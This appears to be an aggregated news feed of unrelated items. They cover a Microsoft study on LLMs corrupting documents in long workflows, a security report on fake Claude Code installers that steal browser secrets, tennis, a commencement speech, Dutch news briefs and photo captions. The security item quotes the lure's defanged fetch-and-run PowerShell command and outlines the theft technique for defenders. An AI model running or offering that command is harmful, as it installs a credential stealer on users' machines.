The Register

Biting the hand that feeds IT — Enterprise Technology News and Analysis

Microsoft researchers find AI models and agents can't handle long-running tasks

Companies exploring automated workflows would be well advised to keep their AI agents on a short leash. Microsoft researchers have found that even the priciest frontier models introduce errors in long workflows, the very thing for which AI software has been pitched. Anthropic, for example, says, "Claude Cowork handles tasks autonomously. Give it a goal and Claude works on your computer, local files, and applications to return a finished deliverable." Redmond promotes similar usage, touting Microsoft 365 Copilot's ability to "Tackle complex, multistep research across your work data and the web." The Windows maker's scientists aren't so sure about that. Philippe Laban, Tobias Schnabel, and Jennifer Neville from Microsoft Research set out to study what happens when large language models (LLMs) are asked to complete multistep tasks. They recently published their findings in a preprint paper with a spoiler title: "LLMs Corrupt Your Documents When You Delegate." To test how LLMs handle long-running knowledge work tasks, the researchers devised a benchmark called DELEGATE-52. It simulates multistep workflows across 52 professional domains, such as writing code, crystallography, and music notation. It is a more taxing test than sorting a spreadsheet, a task that should be table stakes for any aspiring workflow agent. In the accounting domain, for example, the challenge involves a seed document that represents the accounting ledger of Hack Club, a nonprofit organization. The model is asked to split the seed document into separate category-based files and then to merge these chronologically back into a single file. "Our findings show that current LLMs introduce substantial errors when editing work documents, with frontier models (Gemini 3.1 Pro, Claude 4.6 Opus, and GPT 5.4) losing on average 25 percent of document content over 20 delegated interactions, and an average degradation across all models of 50 percent," the authors report. The authors found that LLMs did better on programming tasks and worse on natural language tasks. To be considered "ready" for a given work domain, the researchers set the bar at 98 percent or higher after 20 interactions. They only found one domain qualified: Python programming. For every other domain, the authors found LLMs fell short of "ready." "A per-domain breakdown of end-of-simulation scores reveals that models are not ready for delegated workflows in the vast majority of domains, with models severely corrupting documents (at least -20 percent degradation) in 80 percent of our simulated conditions," the authors state. The study found that "catastrophic corruption," meaning a benchmark score of 80 percent or less, occurred in more than 80 percent of model/domain combinations. The best performing model, Google Gemini 3.1 Pro, was ready for only 11 of 52 domains. In weaker models, degradation took the form of content deletion; in frontier models, it took the form of content corruption. And when errors occurred, they tended to happen all at once, resulting in the loss of 10 to 30 points in a single round-trip interaction, rather than accumulating over the entire test run. "The stronger models (Gemini 3.1 Pro, Claude 4.6, GPT 5.4) aren’t avoiding small errors better, they delay critical failures to later rounds and experience them in fewer interactions," the researchers observe in their paper. The Microsoft authors went on to test how agents – LLMs given access to file reading, writing, and code execution through a basic harness – handle the DELEGATE-52 benchmark. Tools in this instance didn't help. "The four tested models perform worse when operated agentically with tools than without, incurring an average additional degradation of 6 percent by the end of simulation," the authors observe, in reference to GPT-5.4, 5.2, 5.1, and 4.1. Given that task delegation is the whole point of an AI agent – if you wanted to do it yourself, you wouldn't have tried to automate the task – this casts a bit of a shadow on the AI hype train. An intern who corrupted a quarter of a document over a long workflow would be shown the door. Yet companies are showing AI the money: according to Deloitte, organizations are spending an average of 36 percent of their digital budgets on AI automation. That might make sense if arming LLMs with the tools to function as full-blown agents meant less document degradation. But that's not the case. The authors found "using a basic agentic harness does not improve the performance of LLMs" with regard to the DELEGATE-52 test and that LLM performance after two interactions doesn't reflect how models perform after 20, which they argue underscores the need for long-horizon evaluation. "Current LLMs are ready for delegated workflows in some domains such as Python coding, but not in other less common domains," the authors conclude. "In general, users still need to closely monitor LLM systems as they operate and complete tasks on their behalf." Yet they also note that LLMs have been getting better, pointing to the performance of OpenAI's GPT model family, which has seen its benchmark performance increase over 16 months from 14.7 percent to 71.5 percent. ®

Cookie thieves caught stealing dev secrets via fake Claude Code installers

An ongoing campaign steals developers’ secrets via fake Claude Code installers and other popular coding tools, according to Ontinue’s security researchers. The lure - as with several other infostealer attacks targeting developers over the past several months - mimics a legitimate one-line installer for an attacker-controlled command. In this case, the command is “irm https[:]//claude[.]ai/install.ps1 | iex”, and the lure replaced the destination host with “irm events[.]msft23[.]com | iex”. The payload is unique, and doesn’t match up with any documented malware family. It does, however, wreak havoc on developers exfiltrating decrypted cookies, passwords, and payment methods from Chromium-based browsers such as Google Chrome, Microsoft Edge, Brave, Vivaldi, and Opera. According to the threat hunters who documented the new campaign on Monday: “We publish for peer correlation rather than attribution.” The attacks also abuses the IElevator2 COM interface. This is Chromium’s elevation service used to handle App-Bound Encryption (ABE), specifically for encrypting and decrypting sensitive user data like cookies and passwords. Google introduced the new interface in January to protect Chromium-based browser data from cookie thieves, who used earlier ABE bypass techniques and commodity stealers that file-copied the SQLite databases holding cookies and saved passwords. However, crafty crooks (and security researchers) soon figured out workarounds to abuse IElevator2, as is the case with the newly spotted malware. The attack runs across three domains, all registered within six days of each other in April, and all fronted through Cloudflare. It relies on developers searching for “install claude code,” and selecting a sponsored result that leads to a lookalike Claude Code installation page. The page downloads and executes Anthropic’s authentic installer - but as Ontinue’s team found, the malicious instruction isn’t stored in the file itself, but instead rendered into the HTML of the landing page. “Automated scanners, URL reputation services, and any skeptical reviewer who simply curls the URL therefore observe clean PowerShell delivered from a Cloudflare-fronted domain bearing a valid Let’s Encrypt certificate,” the researchers wrote. “Victims, meanwhile, are presented with an entirely different command.” The pasted command redirects victims to an obfuscated PowerShell loader that injects a native AEB helper into a live browser process. The helper’s “exclusive purpose,” we’re told, is to invoke the browser's IElevator2 COM interface and recover the App-Bound Encryption key. The helper formats a pipe to exfiltrate sensitive data using Chromium’s legitimate Mojo naming convention for IPC pipes. It then attempts to use IElevator2 to decrypt developer secrets, but it falls back to the legacy interface on the Elevation Service alongside the legacy IElevator if the new one doesn’t work. Ontinue’s researchers published a full list of elevation-service identifiers, so be sure to check that out. And after receiving the ABE key from the helper, the PowerShell loader decrypts the local browser databases and sends the stolen data to an attacker-controlled server via an in-memory secure_prefs.zip archive. The malware hunters say that they compared the malware against published reporting for the several stealers - including Lumma, StealC, Vidar, EddieStealer, Glove Stealer, Katz Stealer, Marco Stealer, Shuyal, AuraStealer, Torg Grabber, VoidStealer, Phemedrone, Metastealer, Xenostealer, ACRStealer, DumpBrowserSecrets, DeepLoad, and Storm - and found no technical match. The closest is Glove Stealer, first documented by Gen Digital in November 2024, which also abuses IElevator via a helper module communicating over a named pipe. The orchestration model, however, differs from Glove in that it uses a “small native helper acting as a single-purpose ABE oracle, with all detection-visible activity pushed into PowerShell.” According to the research team, this split matters for defenders because "behavioral rule sets that look at the native PE in isolation will see nothing actionable,” as they wrote. “Detection has to land at the COM call and at the PowerShell layer.” ®

The Guardian

Latest news, sport, business, comment, analysis and reviews from the Guardian, the world's leading liberal voice

Iga Swiatek finds her flawless best to dismantle Naomi Osaka at Italian Open

  • World No 3 through to last eight after 6-2, 6-1 win

  • Sinner trounces Popyrin to set up Pellegrino meeting

Iga Swiatek produced a statement victory in a battle between two of the game’s best, mercilessly dismantling Naomi Osaka 6-2, 6-1 to return to the quarter-finals of the Italian Open.

This was the type of confidence-building performance Swiatek, the fourth seed, has been seeking for some time. After a tense opening four games, the four-time French Open champion put together a near flawless match, winning 10 of the last 11 games. Swiatek found a sweet balance between stifling Osaka with her heavy topspin and offensive weaponry while also drawing errors from her adversary with her tireless consistency.

Continue reading...

Slashdot

News for nerds, stuff that matters

Students Boo Commencement Speaker After She Calls AI the 'Next Industrial Revolution'

An anonymous reader quotes a report from 404 Media: Speaking to graduates of University of Central Florida's College of Arts and Humanities and Nicholson School of Communication and Media on May 8, commencement speaker Gloria Caulfield, vice president of strategic alliances at Tavistock Group, told graduating humanities students that AI is the "next industrial revolution," and was met with thousands of booing graduates. "And let's face it, change can be daunting. The rise of artificial intelligence is the next industrial revolution," Caulfield said. At that point, murmurs rippled through the crowd. Caulfield paused, and the crowd erupted into boos. "Oh, what happened?" Caulfield said, turning around with her hands out. "Okay, I struck a chord. May I finish?" Someone in the crowd yelled, "AI SUCKS!"

Her speech begins around the hour and 15 minute mark in the UCF livestream. [...] Before the industrial revolution comment, Caulfield praised Jeff Bezos for his passion and use of Amazon as a "stepping stone" to his real dream: spaceflight. Rattled after the crowd's reaction, she continued her speech: "Only a few years ago, AI was not a factor in our lives." The crowd cheered. "Okay. We've got a bipolar topic here I see," Caulfield said. "And now AI capabilities are in the palm of our hands." The crowd booed again. "I love it, passion, let's go," she said. "AI is beginning to challenge all major sectors to find their highest and best use," she continued. "Okay, I don't want any giggles when I say this. We have been through this before, these industrial revolutions. In my graduation era, we were faced with the launch of the internet."

She goes on to talk about how cellphones used to be the size of briefcases. "At that time we had no idea how any of these technologies would impact the world and our lives. [...] These were some of the same trepidations and concerns we are now facing. But ultimately it was a game changer for global economic development and the proliferation of new businesses that never existed like Apple and Google and Meta and so many others, and not to mention countless job opportunities. So being an optimist here, AI alongside human intelligence has the potential to help us solve some of humanity's greatest problems. Many of you in this graduating class will play a role in making this happen."

Read more of this story at Slashdot.

Wel.nl

Minder lezen, Meer weten.

Bert Natter wint Libris Literatuur Prijs 2026

AMSTERDAM (ANP) - Bert Natter heeft de Libris Literatuur Prijs gewonnen met het boek Aan het einde van de oorlog. Dat maakte de jury van de prestigieuze prijs maandagavond bekend in de uitzending van Nieuwsuur.

De jury, met journalist en presentator Noraly Beyer als voorzitter, omschrijft het boek van Natter als een "ware tour de force". Aan het einde van de oorlog speelt zich af op een dag rond een concentratiekamp en volgt 31 personages. "Het getuigt van grote literaire kunde om dit stemmenkoor zo vanzelfsprekend te laten vloeien", stelt de jury in het juryrapport. Ook slaagt Natter erin "een volstrekt origineel, eigenzinnig en prachtig nieuw boek over dit zware onderwerp te schrijven."

Volgens de jury laat Natter met zijn roman ook zien dat verhalen uit de Tweede Wereldoorlog nog niet allemaal verteld zijn. "Natter laat ons met deze roman opnieuw kijken naar een historische periode die we al dachten te kennen, maar die we nu als met nieuwe ogen zien. En dat is een geweldige literaire prestatie."

Overige kanshebbers

Peter Buwalda (De jaknikker), Lieselot Mariën (Als de dieren), Coco Schrijber (Het gezoem van bijna alles), Peter Terrin (Nog lang geen winter) en Nadia de Vries (Overgave op commando) waren de andere overgebleven kanshebbers op de shortlist.

De Libris Literatuur Prijs is een prestigieuze onderscheiding voor de beste Nederlandstalige roman van het afgelopen jaar. Natter ontvangt 50.000 euro en een bronzen legpenning. Vorig jaar ging de prijs naar Safae el Khannoussi voor haar roman Oroppa.


Britse media: ministers vragen Starmer op te stappen

LONDEN (ANP) - Meerdere ministers hebben de Britse premier Keir Starmer gevraagd op te stappen, melden Britse media. Volgens The Times hebben drie leden van het kabinet, onder wie de minister van Binnenlandse Zaken Shabana Mahmood, Starmer verteld dat hij zijn positie moet heroverwegen. Sky News schrijft dat de ministers hem dinsdag in een vergadering gaan vertellen dat "het spel voorbij is".

Starmer is al maanden zeer onpopulair onder de Britse bevolking en partijgenoten hebben hem al eerder opgeroepen om te vertrekken. Afgelopen donderdag boekte zijn partij Labour enorme verliezen bij lokale verkiezingen in Engeland en parlementsverkiezingen in Schotland en Wales. Dat leidde tot nog grotere druk op Starmer.

De premier probeerde maandagochtend zijn politieke toekomst te redden door het land toe te spreken. Hij erkende de frustratie onder de burgers en beloofde beterschap. Toch is het aantal Labour-parlementariërs dat Starmers vertrek eist na de speech verdubbeld tot meer dan zeventig.


Bezoekers afgelast festival Music On kunnen geld terugkrijgen

AMSTERDAM (ANP) - Mensen met een kaartje voor het afgelaste festival Music On kunnen hun geld terugkrijgen of hun ticket inzetten om de eerstvolgende editie bij te wonen. Dat meldt organisator Loveland maandagavond. "Op dit moment zijn wij hard bezig met het opzetten van een systeem om de afhandeling omtrent tickets zo soepel en zorgvuldig mogelijk te laten verlopen."

Het festival had afgelopen zaterdag moeten plaatsvinden in het Meerpark in Amsterdam-Oost, maar de gemeente trok op het laatste moment de vergunning in. De veiligheid van de feesttent op het terrein kon niet gegarandeerd worden. De organisatie spande direct een kort geding aan, maar verloor dat. "Wij respecteren die uitspraak", aldus Loveland, "maar wij zijn ervan overtuigd dat het proces niet zorgvuldig is verlopen."


Weer records op Wall Street ondanks uitspraken Trump over Iran

NEW YORK (ANP) - De toonaangevende Amerikaanse beursgraadmeters, de S&P 500 en de Nasdaq, hebben maandag hun recordstanden van afgelopen vrijdag iets verder aangescherpt. De stemming werd wel gedrukt door uitspraken van de Amerikaanse president Donald Trump over het staakt-het-vuren met Iran. Volgens hem ligt het bestand "aan de beademing" nadat hij eerder het Iraanse vredesvoorstel had afgewezen.

De S&P 500, de graadmeter van de vijfhonderd grootste Amerikaanse bedrijven, eindigde 0,2 procent hoger op 7412,84 punten en de Nasdaq klom 0,1 procent tot 26.274,13 punten. De Dow-Jonesindex won 0,2 procent tot 49.704,47 punten.

Chipbedrijven behoorden tot de winnaars op Wall Street. Nvidia, het waardevolste bedrijf ter wereld, klom 2 procent. Qualcomm en Micron Technology waren, met plussen tot ruim 8 procent, procentueel sterkere stijgers. De topmannen van deze chipconcerns werden maandag door het Witte Huis uitgenodigd om deze week met Trump mee te gaan naar zijn ontmoeting met de Chinese president Xi Jinping.


Cruiseschip m/v Hondius volgens planning zondag in Rotterdam

ROTTERDAM (ANP) - De rederij achter cruiseschip m/v Hondius, OceanWide Expeditions, meldt dat het schip zondag in Rotterdam moet aankomen. Het schip vertrok maandagavond rond 19.00 uur lokale tijd vanuit Tenerife en doet er volgens de planning zes dagen over om de eindbestemming te bereiken.

Enkele bemanningsleden bleven achter op de Hondius en varen het schip terug naar Rotterdam. Daar wordt het schoongemaakt. Het schip komt oorspronkelijk uit Vlissingen.

Op het schip brak vorige maand het hantavirus uit. Twee Nederlandse opvarenden, een echtpaar, overleden daaraan. Ook een Duitse opvarende bezweek aan het virus. Alle opvarenden zijn inmiddels van het schip geëvacueerd en worden teruggevlogen naar hun eigen landen. De meesten van hen gaan in quarantaine, al dan niet vrijwillig.


Netanyahu ziet EU-sancties voor kolonisten als 'moreel bankroet'

JERUZALEM (ANP) - De Israëlische premier Benjamin Netanyahu heeft de EU-sancties voor gewelddadige kolonisten afgedaan als het "moreel bankroet" van de Europese Unie. In een verklaring van zijn kantoor op X staat dat de Europeanen op deze manier de kolonisten op de Westelijke Jordaanoever gelijkstellen aan Hamas.

Israël bezet de Westoever sinds 1967. Sindsdien hebben kolonisten daar nederzettingen gebouwd, die volgens de Verenigde Naties illegaal zijn. Ondanks internationale kritiek neemt het aantal nederzettingen nog steeds elk jaar toe. Daarnaast worden Palestijnse dorpen afgebroken en burgers verdreven. Daarbij komen regelmatig mensen om het leven. Volgens de VN werden vorig jaar 230 Palestijnen op de Westelijke Jordaanoever gedood door Israëlische kolonisten en troepen.

Netanyahu stelt dat Joden het recht hebben om te leven in Judea en Samaria, zoals de Israëliërs de Westoever noemen. De premier zegt de Joodse kolonisten te beschermen.


MKB-voorman Jacco Vonhof wordt voorzitter van Deltalinqs

DEN HAAG (ANP) - Jacco Vonhof, voorman van MKB-Nederland, wordt de nieuwe voorzitter van Deltalinqs. Dat is de ondernemersvereniging voor bedrijven in het Rotterdamse havengebied. Eind vorig jaar werd bekend dat Victor van der Chijs, destijds voorzitter van Deltalinqs, per maart zou vertrekken om een nieuwe universiteit in Dubai op te gaan zetten.

Vorige maand werd bekend dat Vonhof na bijna acht jaar weggaat bij MKB-Nederland. Hij wordt opgevolgd bij de ondernemersorganisatie door Marijke Vuik, de huidige voorzitter van Koninklijke Horeca Nederland.

"De Rotterdamse haven spreekt bij iedereen tot de verbeelding. De bedrijven in de haven voorzien ons van alles wat dagelijks nodig is. Van stroom, halffabricaten en brandstoffen tot voeding", zegt Vonhof in een toelichting op zijn benoeming. Hij krijgt geen makkelijke taak, want bedrijven in de Rotterdamse haven hebben het moeilijk door hoge energieprijzen, strenger klimaat- en milieubeleid en groeiende internationale concurrentie.


NOC*NSF bevestigt formele gesprekken Thialf voor Spelen 2030

HEERENVEEN (ANP) - Het organisatiecomité van de Olympische Winterspelen van 2030 in de Franse Alpen wil formeel onderhandelen met Nederland over de organisatie van het schaatstoernooi in schaatsstadion Thialf in Heerenveen. Dat bevestigt NOC*NSF maandagavond aan het ANP. Tot dusver was naast Heerenveen ook Turijn in beeld.

"Daarmee is de kans op toewijzing van het olympisch schaatsen tijdens de Spelen in 2030 toegenomen, al staat de keuze van de Fransen nog niet vast", schrijft NOC*NSF. Volgens de sportkoepel is "een lange periode van informeren" voorbij, en wordt er de komende tijd "op detailniveau" gesproken.

Bij het binnenhalen van het schaatstoernooi zijn naast Thialf en NOC*NSF ook het ministerie van Volksgezondheid, Welzijn en Sport, de provincie Fryslân, de gemeente Heerenveen en schaatsbond KNSB betrokken. Als het toernooi aan Heerenveen wordt toegewezen, zouden de Olympische Winterspelen voor het eerst in de geschiedenis, weliswaar deels, in Nederland worden gehouden.


VK: Voorpagina

Volkskrant.nl biedt het laatste nieuws, opinie en achtergronden

Libris Literatuur Prijs naar gruwelijke kamproman met razende doorleesfactor

kottke.org

Jason Kottke's weblog, home of fine hypertext products

Mesmerizing 4K Video of a Cat-5 Super Typhoon

Seán Doran, who I’ve featured here many times before for his remastered astronomy photos & videos, has taken photographs captured by a Japanese weather satellite of Typhoon Sinlaku in April 2026 and “repaired, remastered and transformed” the images into this breathtaking 4K video.

The beauty of the storm as seen from above belies its fury and destructiveness. Sinlaku was “strongest tropical cyclone in the Northern Hemisphere” since 2021 and the strongest overall storm so far in 2026. The Mariana Islands, Guam, and Micronesia all suffered widespread damage and the storm has claimed 17 lives so far.

Tags: hurricanes · mesmerizing · satellite imagery · Sean Doran · video · weather

DICKIE TERUG in het StamCafé

In dit StamCafé hebben we ineens weer zin in het WK. Na veel onduidelijkheid besloten dat Dick Advocaat (78) GEWOON MEEGAAT met de Curaçaose ploeg. Hij had zich plotseling teruggetrokken vanwege de ernstige ziekte van zijn dochter en toen waren we even droevig, want wij houden van Dick. We worden vrolijk van Dick. Soms zijn er dagen dat we er ff geen zin in hebben en dan denken we aan Dick en dan hebben we er weer zin in. Als je het ons vraagt bestaat er niet zoiets als genoeg Dick, ondanks dat we in onze rijke levens al zoveel Dick hebben gezien. AFIJN. Voor de jongens van Curaçao is Dick ook beter. Als je met 8-0 wordt afgedroogd op je eerste en waarschijnlijk enige WK (met spelers van RKC, SK Beveren, Rotherham United en Idgir FK) en je kijkt naar de zijlijn en daar staat Fred Rutten, wordt het er allemaal niet beter op. Nu kunnen ze kijken naar Dick. De oudste coach op een wereldkampioenschap OOIT.

Beeld: Dick Advocaat op een training (??) van Curaçao

Kochelsee

Peter Kernwein posted a photo:

Kochelsee

Kochelsee

Peter Kernwein posted a photo:

Kochelsee

Kochelsee

Peter Kernwein posted a photo:

Kochelsee

Kochelsee

Peter Kernwein posted a photo:

Kochelsee

Kochelsee

Peter Kernwein posted a photo:

Kochelsee